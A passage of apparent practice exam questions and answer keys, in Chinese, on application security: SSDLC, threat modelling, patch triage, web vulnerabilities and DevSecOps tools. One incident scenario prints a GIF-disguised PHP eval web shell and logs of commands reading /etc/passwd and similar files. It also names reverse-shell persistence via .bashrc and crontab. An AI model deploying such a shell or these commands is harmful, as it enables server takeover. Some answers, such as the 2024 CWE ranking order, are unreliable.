Cycle，SSDLC）中，有關開發與測試階段，可以協助降低資安風險的有下列哪些項目？（複選） > - \(A\) 部署網頁應用程式防火牆 > - \(B\) 滲透測試 > - \(C\) 原始碼檢測 > - \(D\) 第三方元件資安檢測 <details> <summary>查看答案</summary> **\(B\)\(C\)\(D\)** - A 錯：WAF 是「部署/維運」階段的措施 - B 對：滲透測試 → 測試階段 - C 對：原始碼檢測（SAST） → 開發階段 - D 對：第三方元件檢測（SCA） → 開發階段 </details> --- > **Q：** 【題組 5】情境如附圖所示，在風險管理上，使用威脅評估模型進行供應鏈資安風險評估。請問下何者敘述錯誤？ > > **情境**：各產業對於軟體供應鏈安全的韌性要求，包含供應鏈上下游的公司資訊安全、軟體安全等。在風險管理方面可以透過參考或導入 ISO 系統以達到有效的管控。 > > - \(A\) DREAD 是威脅建模的一種模式 > - \(B\) STRIDE 是威脅建模的一種模式 > - \(C\) VAST 是威脅建模的一種模式 > - \(D\) NIST 是國際標準的威脅建模 <details> <summary>查看答案</summary> **\(D\) NIST 是國際標準的威脅建模** NIST 是標準制定機構（如 NIST CSF、SP 800-207），不是威脅建模模型。 </details> --- > **Q：** 【題組 4】情境如圖所示。承上題，XYZ 公司在開發新產品時所面臨的資安風險，請問有下列哪些方式可以導入處理？（複選） > - \(A\) 當產品開發測試階段完成後再處理所有安全問題 > - \(B\) 產品安全事件管理上需通知客戶相關風險並提供產品安全修補，並納入新產品的設計考量之中 > - \(C\) 產品開設計階段進行威脅建模以分析潛在漏洞 > - \(D\) 使用靜態程式碼分析工具檢查程式碼安全 <details> <summary>查看答案</summary> **\(B\)\(C\)\(D\)** - A 錯：安全問題應在各階段處理（Shift Left），不是等測試完成後才處理 - B 對：事件管理 + 回饋至新產品設計 - C 對：設計階段進行威脅建模（Threat Modeling） - D 對：開發階段使用 SAST（靜態程式碼分析） </details> --- > **Q：** 目前有一個大企業，員工超過 5000 人、系統超過 500 個，想要定期對內部進行弱點掃描，請問在實務考量下（人力、資源、時間都有限），下列觀念何者較為正確？ > - \(A\) 無論弱點的風險等級是重大、高、中、低，無論弱點數量有多少個，無論資訊部門的人力是否足夠，都應該在一天之內把所有弱點都修補完畢，才能確保企業是安全的 > - \(B\) 只要掃描出來的弱點類型屬於 OWASP Top 10 其中之一，就應該立刻進行修補，不需要對弱點進行任何評估 > - \(C\) 掃描結果出爐後，應先針對每個弱點的風險等級、實際影響程度、有無出現攻擊利用程式（Exploit）進行評估，同時也要考慮重開機或停機對企業服務的影響程度，最後再來規劃每個弱點的修補時程 > - \(D\) 當某台伺服器的弱點掃描結果出現作業系統弱點時，如果該作業系統的官方網站沒有釋出任何修補更新檔（patch），維運人員就不需要對該伺服器做任何處置 <details> <summary>查看答案</summary> **\(C\) 掃描結果出爐後，應先針對每個弱點的風險等級、實際影響程度、有無出現攻擊利用程式（Exploit）進行評估...** - A 錯：資源有限下不可能一天修完所有弱點，需依風險排序 - B 錯：即使是 OWASP Top 10，仍需評估實際影響後再決定修補順序 - C 對：正確流程 — 評估風險、影響、Exploit、業務衝擊 → 排定修補時程 - D 錯：無官方 Patch 仍應採取緩解措施（關閉服務、網路隔離等） </details> --- > **Q：** 當企業遇到資安攻擊時，可以思考各種不同的方式來進行防禦，以便修補漏洞或暫時緩解。開發人員或資安維運人員必須選擇最合適的防禦機制來修補資安漏洞。下列何種防禦手法的「效果最差」，很容易被攻擊者用其他方式繞過？ > - \(A\) Filter Input and Escape Output，也就是過濾使用者輸入的特殊字元，並且在後端輸出內容時將特殊字元進行轉化，避免發生 XSS 攻擊 > - \(B\) 實作上傳功能時，檢查上傳檔案的內容與路徑，也限制上傳檔案的副檔名，並且將檔案搬移至上傳檔案專屬目錄，甚至是上傳到靜態檔案專屬的伺服器，同時也將該目錄設定為不可執行檔案，避免有網頁程式碼在該目錄被執行 > - \(C\) 撰寫資料庫查詢功能時，無論參數是不是使用者所輸入的，都必須針對參數內容進行過濾，移除所有非必要的特殊字元，並且對無法移除的特殊字元進行轉化。同時建議使用 Prepared Statement 來撰寫資料庫查詢功能會較為安全 > - \(D\) 在一個需要串接系統指令的網頁應用程式中，開發人員在網頁程式前端使用 JavaScript 來過濾特殊字元，防止攻擊者在參數中注入特殊字元來執行系統指令並達成 Command Injection 攻擊 <details> <summary>查看答案</summary> **\(D\) 在一個需要串接系統指令的網頁應用程式中，開發人員在網頁程式前端使用 JavaScript 來過濾特殊字元...** 前端 JavaScript 驗證可以被繞過（攻擊者可直接發送 HTTP 請求），驗證必須在**後端**執行才有效。 </details> --- > **Q：** 漏洞是指因開發過程中不慎製造而導致安全性風險的弱點，依照 2024 SANS / CWE TOP 25 所指出的前 25 最危險的程式設計錯誤，下列那些是排名前五的項目？（複選） > - \(A\) CWE-352 Cross-Site Request Forgery（CSRF） > - \(B\) CWE-125 Out-of-bounds Read > - \(C\) CWE-416 Use After Free > - \(D\) CWE-787 Out-of-bounds Write <details> <summary>查看答案</summary> **\(A\)\(D\)** 2024 CWE Top 5： 1. CWE-787 Out-of-bounds Write ✓ 2. CWE-79 XSS 3. CWE-89 SQL Injection 4. CWE-352 CSRF ✓ 5. CWE-22 Path Traversal - A 對：CSRF 排名第 4 - B 錯：Out-of-bounds Read 排名第 7 - C 錯：Use After Free 排名第 8 - D 對：Out-of-bounds Write 排名第 1 > ⚠️ 2025 版排名略有變動，CSRF 升至第 3、Out-of-bounds Write 降至第 5 </details> --- > **Q：** 【題組 4】情境如附圖所示。你登入那台被入侵的伺服器之後，在網頁目錄中發現一個沒看過的檔案 index2.php，檔案內容如下。請問下列何項描述「錯誤」？ > > ``` > GIF89a > <?php @eval($_REQUEST["input"]);exit;?> > ``` > > - \(A\) GIF89a 是 GIF 圖片的檔頭（File Header） > - \(B\) 這是一張 GIF 圖片，如果在作業系統裡面點擊圖片檔案的話，圖片顯示的內容是「input」 > - \(C\) 這個檔案可能被伺服器誤以為是一個圖檔，因此允許使用者上傳到目錄中，但其中包含一段 PHP 程式碼，可能會造成威脅 > - \(D\) 這個檔案就是常見的一句話木馬，可以用來執行 PHP 程式碼，攻擊者通常會用來控制伺服器 <details> <summary>查看答案</summary> **\(B\) 這是一張 GIF 圖片，如果在作業系統裡面點擊圖片檔案的話，圖片顯示的內容是「input」** - A 對：`GIF89a` 是 GIF 圖片的 Magic Number（檔頭標識） - B 錯：這**不是**真正的 GIF 圖片，只是在 PHP 檔案開頭加上 GIF89a 偽裝，用來繞過檔案上傳的檔頭檢查 - C 對：伺服器若只檢查檔頭，會誤判為圖片而允許上傳 - D 對：`@eval($_REQUEST["input"])` 是典型一句話木馬，可執行任意 PHP 程式碼 </details> --- > **Q：** 【題組 4】情境如附圖所示。承上題，你經過調查之後，在 log 中發現好幾個可疑的內容，請問下列哪一個 log 的推論最有可能是「錯誤」的？ > - \(A\) 關於「/index2.php?input=phpinfo();」這個 log，攻擊者想透過 PHP 的內建函式 phpinfo 取得更多系統資訊 > - \(B\) 關於「/index2.php?input=system('cat /etc/passwd');」這個 log，攻擊者想知道每個使用者的明文密碼內容是什麼 > - \(C\) 關於「/index2.php?input=system('cat /etc/sudoers');」這個 log，攻擊者想知道有哪些帳號可以提升權限變成 root，但是若權限不夠高可能看不到檔案內容 > - \(D\) 關於「/index2.php?input=system('cat /proc/self/environ');」這個 log，攻擊者想知道目前 process 中有哪些環境變數 <details> <summary>查看答案</summary> **\(B\) 關於「/index2.php?input=system('cat /etc/passwd');」這個 log，攻擊者想知道每個使用者的明文密碼內容是什麼** - `/etc/passwd`：存放使用者帳號資訊（UID、GID、家目錄等），**不含密碼** - `/etc/shadow`：存放密碼雜湊（需 root 權限才能讀取） 攻擊者查看 `/etc/passwd` 是為了列舉系統帳號，不是取得明文密碼。 </details> --- > **Q：** 【題組 4】情境如附圖所示。承上題，當你調查完畢之後，你判斷這個網頁系統中有一個任意檔案上傳漏洞，因此迅速把弱點資訊回報給資訊部門，並且提供修補建議請他們修補漏洞。請問下列何項建議對於修補這個資安漏洞最「不」適切？ > - \(A\) 限制上傳檔案的副檔名，並且將檔案移到指定的目錄中 > - \(B\) 將上傳的圖片進行破壞性的轉檔，讓檔案中潛藏的惡意程式碼失效 > - \(C\) 透過前端網頁限制使用者不可上傳 GIF 圖片，只要檔名有 .gif 就不讓使用者上傳 > - \(D\) 將存放網頁應用程式的目錄設定為不可執行檔案 <details> <summary>查看答案</summary> **\(C\) 透過前端網頁限制使用者不可上傳 GIF 圖片，只要檔名有 .gif 就不讓使用者上傳** - A 對：限制副檔名 + 指定目錄，正確的防禦措施 - B 對：破壞性轉檔（如重新壓縮圖片）可破壞嵌入的惡意程式碼 - C 錯：**前端驗證可被繞過**，攻擊者可直接發送 HTTP 請求；且只檢查副檔名不夠全面 - D 對：上傳目錄設定不可執行，即使上傳惡意檔案也無法執行 </details> --- > **Q：** 【題組 4】情境如附圖所示。承上題，你把該檔案移除之後，你發現系統中仍然有人在執行攻擊指令，你推測可能是紅隊人員在取得系統控制權之後，有執行一連串維持權限（Persistence）的動作。請問以下哪些是紅隊人員用來維持權限的技巧？（複選） > - \(A\) 使用知名的連線工具 nc，輸入 nc 127.0.0.1 22 這個指令就可以建立後門 > - \(B\) 將 SSH 的登入金鑰寫入 ~/.ssh/known_hosts，以便可以使用 SSH 登入作業系統 > - \(C\) 將反向連線指令寫入到 ~/.bashrc 檔案中，導致使用者一登入就會觸發反向連線 > - \(D\) 將指令寫入 crontab，每小時定期執行反向連線程式 <details> <summary>查看答案</summary> **\(C\)\(D\)** - A 錯：`nc 127.0.0.1 22` 只是連線到本機 SSH，不是建立後門 - B 錯：應該寫入 `~/.ssh/authorized_keys` 才能免密碼登入；`known_hosts` 是記錄已連線過的主機 - C 對：`.bashrc` 在使用者登入時執行，可觸發反向連線（Persistence 技巧） - D 對：`crontab` 定期執行任務，可維持持久化存取（Persistence 技巧） > 這些都是 MITRE ATT&CK Persistence 戰術的常見技術 </details> --- > **Q：** 【題組 5】情境如附圖所示。在以高、低權限交叉進行 URI 的比對時，測試人員發現，在高權限進行後台編輯文章時 URI 所帶的參數裡面發現多一個名為 pri 的參數（如附圖二），而低權限的使用者則沒有，因此測試人員嘗試進行修改低權限使用者在該頁面中的 uri 參數，加上了 pri 參數使其與管理人員一致，頁面上出現的是無權限存取，測試人員仔細觀查後發現在該頁面存取時，會送出 Post 的 Http 方法裡帶入了一個 sid 的參數，當測試人員將其帶入到低權限的帳號中，竟然可以成功的存取到管理者可瀏覽的頁面，其功能也完整呈現，這樣的測試證明了這個頁面存在下列那一個 OWASP Top 10 2021 的弱點？（複選） > >  > > - \(A\) A01 Broken Access Control > - \(B\) A05 Security Misconfiguration > - \(C\) A08 Software and Data Integrity Failures > - \(D\) A10 Server Side Request Forgery (SSRF) <details> <summary>查看答案</summary> **\(A\)\(B\)** - A 對：低權限用戶可存取高權限資源 → **Broken Access Control（存取控制失效）** - B 對：伺服器端未正確驗證權限 → **Security Misconfiguration（安全配置錯誤）** - C 錯：與軟體/資料完整性無關 - D 錯：SSRF 是伺服器端請求偽造，與此情境無關 </details> --- > **Q：** 【題組 5】情境如附圖所示。在上述的情境當中，滲透測試人員發現可以透過修改 HTTP POST 參數得到可網站較高的管理權限，而在測試弱點影響主機安全的深度時，在測試過程中，利用 LFI（Local File Inclusion）的弱點讀取到網站應用程式的組態檔，進而發現了該主機的 MySQL 並未針對來源 IP 進行限縮，你身為滲透測試人員在測試報告中下列那一些建議事項，對受測單位而言，在不損及服務可用性的前提下，下列哪些答案符合以最少的金錢、管理、技術對弱點進行有效的管理？（複選） > >  >  > > - \(A\) 限縮僅有我國 IP 能連接到這個服務網站 > - \(B\) 限制能連接到 MySQL 的來源 IP > - \(C\) 導入 MFA（Multi-factor authentication）身份識別的解決方案 > - \(D\) 導入網頁應用程式防火牆 <details> <summary>查看答案</summary> **\(A\)\(B\)\(D\)** 題目要求「最少的金錢、管理、技術」且「不損及服務可用性」： - A 對：限縮國內 IP 連線，低成本且可降低攻擊面 - B 對：限制 MySQL 來源 IP，直接解決發現的問題，低成本 - C 錯：MFA 導入成本較高（金錢、管理、技術皆需投入） - D 對：WAF 可有效防護 LFI、存取控制等 Web 弱點 </details> --- > **Q：** 應用程式安全測試若僅依賴自動化工具進行的成效通常有其侷限，下列描述何者最正確？ > - \(A\) 自動化工具可檢測常見問題，但對客製化商務邏輯了解有限而可能產生許多誤報 > - \(B\) 自動化工具的軟體授權成本較高，因此人工測試更具成本效益 > - \(C\) 自動化工具只能在應用程式處於運行狀態時執行，無法進行靜態程式碼分析 > - \(D\) 應用程式安全測試的報告無法由工具自動生成，必須由人工完成 <details> <summary>查看答案</summary> **\(A\) 自動化工具可檢測常見問題，但對客製化商務邏輯了解有限而可能產生許多誤報** - A 對：自動化工具擅長偵測已知弱點模式（如 SQLi、XSS），但**無法理解客製化商業邏輯**，導致誤報或漏報 - B 錯：成本效益取決於規模，自動化在大規模測試時更有效率 - C 錯：SAST（靜態分析）就是在程式**未運行**時掃描原始碼 - D 錯：自動化工具**可以**自動生成報告 > 關鍵概念：自動化工具需搭配人工測試，才能有效檢測商業邏輯漏洞 </details> --- > **Q：** 一家金融科技公司委託資安廠商對其新上線的行動銀行 App 進行一次完整的資安檢測。為了徹底評估其防護能力，下列何項作業較「不」屬於安全檢測項目？ > - \(A\) 執行滲透測試（Penetration Testing），模擬駭客從外部嘗試入侵 App 與後端伺服器 > - \(B\) 進行原始碼檢測（Source Code Review），找出應用程式邏輯與編碼層面的安全漏洞 > - \(C\) 對其使用的雲端平台環境進行雲端安全配置檢視（Cloud Security Posture Management, CSPM） > - \(D\) 針對 App 安裝檔（.apk / .ipa）進行逆向工程 <details> <summary>查看答案</summary> **\(C\)\(D\)** 題目問的是「**行動銀行 App**」的安全檢測： - A 對：滲透測試 → App 安全檢測核心項目 - B 對：原始碼檢測 → App 安全檢測核心項目 - C 錯：CSPM 是針對「**雲端基礎設施配置**」的檢視，不是針對 App 本身的安全檢測 - D 錯：逆向工程是**分析手段**，不是正式的「安全檢測項目」；且可能涉及智慧財產權議題 > App 安全檢測核心項目：滲透測試、原始碼檢測、弱點掃描、安全組態檢視 </details> --- > **Q：** 【題組 5】情境如附圖所示。你需協助開發團隊建立自動化原始碼檢測機制以提前發現弱點，請問考量 DevSecOps 的精神。下列何種技術最適合整合至 CI/CD 工作流程中？ > > **情境**：你受聘為「超好用科技股份有限公司」的資安顧問，協助執行其年度資訊安全強化計畫。該公司目前正導入 DevSecOps 實踐，並預定完成以下三項目標： > 1. 對旗下新開發的 ERP-Web 系統執行全面「原始碼檢測」與「滲透測試」； > 2. 執行一次針對雲端主機與內部網段的「資安健診」作業； > 3. 建立跨部門的風險評估與弱點修補作業流程，以提升資安治理成熟度。 > > 在測試與健診過程中，團隊發現若干高風險弱點與不當配置，例如：缺乏原始碼檢測、程式碼包含敏感資訊、驗證缺陷等。你需依據檢測結果，提出分析報告、優先順序、工具選用建議，以及內部控制對策，並向董事會報告成果。 > > - \(A\) 靜態應用安全測試（Static Application Security Testing, SAST） > - \(B\) SQL 資料表比對工具 > - \(C\) 黑箱測試（Black-box Testing） > - \(D\) 動態應用安全測試（Dynamic Application Security Testing, DAST） <details> <summary>查看答案</summary> **\(A\) 靜態應用安全測試（Static Application Security Testing, SAST）** DevSecOps 強調「Shift Left」— 將安全檢測提前到開發階段： | 技術 | CI/CD 整合適合度 | 原因 | |:-----|:----------------|:-----| | SAST | ✓ 最適合 | 掃描原始碼，不需執行環境，可於每次 commit 自動觸發 | | DAST | △ 較晚期 | 需要執行中的應用程式，適合測試/部署階段 | | 黑箱測試 | △ 較晚期 | 通常為人工或半自動，不易完全整合 CI/CD | - B 錯：SQL 資料表比對工具不是安全檢測工具 - C、D 錯：需要應用程式運行，無法在開發早期自動化檢測原始碼 </details> --- > **Q：** 【題組 5】情境如附圖所示。你負責進行 ERP-Web 的 Web 弱點滲透測試，需選擇具備攔截與注入模擬功能的工具。請問下列何項工具最適合？ > > **情境**：你受聘為「超好用科技股份有限公司」的資安顧問，協助執行其年度資訊安全強化計畫。該公司目前正導入 DevSecOps 實踐，並預定完成以下三項目標： > 1. 對旗下新開發的 ERP-Web 系統執行全面「原始碼檢測」與「滲透測試」； > 2. 執行一次針對雲端主機與內部網段的「資安健診」作業； > 3. 建立跨部門的風險評估與弱點修補作業流程，以提升資安治理成熟度。 > > - \(A\) SonarQube > - \(B\) Burp Suite > - \(C\) Qualys > - \(D\) Nmap <details> <summary>查看答案</summary> **\(B\) Burp Suite** | 工具 | 用途 | 攔截/注入功能 | |:-----|:-----|:-------------| | SonarQube | SAST 靜態原始碼分析 | ✗ | | **Burp Suite** | **Web 應用程式滲透測試** | **✓ 代理攔截、請求修改、注入測試** | | Qualys | 弱點掃描平台 | ✗ | | Nmap | 網路/Port 掃描 | ✗ | > Burp Suite 核心功能：HTTP 代理攔截（Proxy）、請求修改與重送（Repeater）、自動化掃描（Scanner）、入侵測試（Intruder） </details> --- > **Q：** 【題組 5】情境如附圖所示。你在整理將完整的測試報告準備提交給董事會，下列何項內容最「不」重要？ > > **情境**：你受聘為「超好用科技股份有限公司」的資安顧問，協助執行其年度資訊安全強化計畫。該公司目前正導入 DevSecOps 實踐，並預定完成以下三項目標： > 1. 對旗下新開發的 ERP-Web 系統執行全面「原始碼檢測」與「滲透測試」； > 2. 執行一次針對雲端主機與內部網段的「資安健診」作業； > 3. 建立跨部門的風險評估與弱點修補作業流程，以提升資安治理成熟度。 > > 在測試與健診過程中，團隊發現若干高風險弱點與不當配置，例如：缺乏原始碼檢測、程式碼包含敏感資訊、驗證缺陷等。你需依據檢測結果，提出分析報告、優先順序、工具選用建議，以及內部控制對策，並向董事會報告成果。 > > - \(A\) 測試人員背景與工具版本 > - \(B\) 執行測試所需耗費的時間 > - \(C\) 符合公司期望及需求的結論 > - \(D\) 弱點評估結果、評估計分的方法論、分數與修補建議 <details> <summary>查看答案</summary> **\(B\) 執行測試所需耗費的時間** 向**董事會**報告時，應聚焦於： - 風險與影響（弱點評估結果） - 結論與建議（是否符合需求、修補建議） - 可信度佐證（測試人員背景、方法論） 「執行測試耗費的時間」屬於**作業細節**，對董事會的決策參考價值最低。 > 報告對象不同，內容重點不同： > - 董事會：關心風險、影響、結論 > - 技術團隊：關心細節、步驟、重現方式 </details> --- > **Q：** 【題組 5】情境如附圖所示。進行系統原始碼掃描時，下列哪些情境可被歸類為「Broken Authentication」或「Access Control」相關問題？（複選） > > **情境**：你受聘為「超好用科技股份有限公司」的資安顧問，協助執行其年度資訊安全強化計畫。該公司目前正導入 DevSecOps 實踐，並預定完成以下三項目標： > 1. 對旗下新開發的 ERP-Web 系統執行全面「原始碼檢測」與「滲透測試」； > 2. 執行一次針對雲端主機與內部網段的「資安健診」作業； > 3. 建立跨部門的風險評估與弱點修補作業流程，以提升資安治理成熟度。 > > - \(A\) 密碼輸入不經雜湊儲存於資料庫 > - \(B\) 可以修改自己的帳號讀取到其他人帳號參數 > - \(C\) 使用 Base64 加 SHA256 加鹽雜湊儲存密碼 > - \(D\) 以 GET 方法將帳號與密碼置於 URL 參數 <details> <summary>查看答案</summary> **\(A\)\(B\)\(D\)** | 選項 | 問題類型 | 說明 | |:-----|:---------|:-----| | A | Broken Authentication | 密碼明文儲存，未經雜湊保護 | | B | Access Control（IDOR） | 可透過修改參數存取他人資料 | | C | ✓ 正確做法 | 加鹽雜湊是安全的密碼儲存方式 | | D | Broken Authentication | 帳密置於 URL 會被記錄在日誌、瀏覽器歷史、Referer 中 | > **IDOR（Insecure Direct Object Reference）**：透過修改 ID 參數直接存取未授權的資源，屬於 Access Control 問題 </details> ---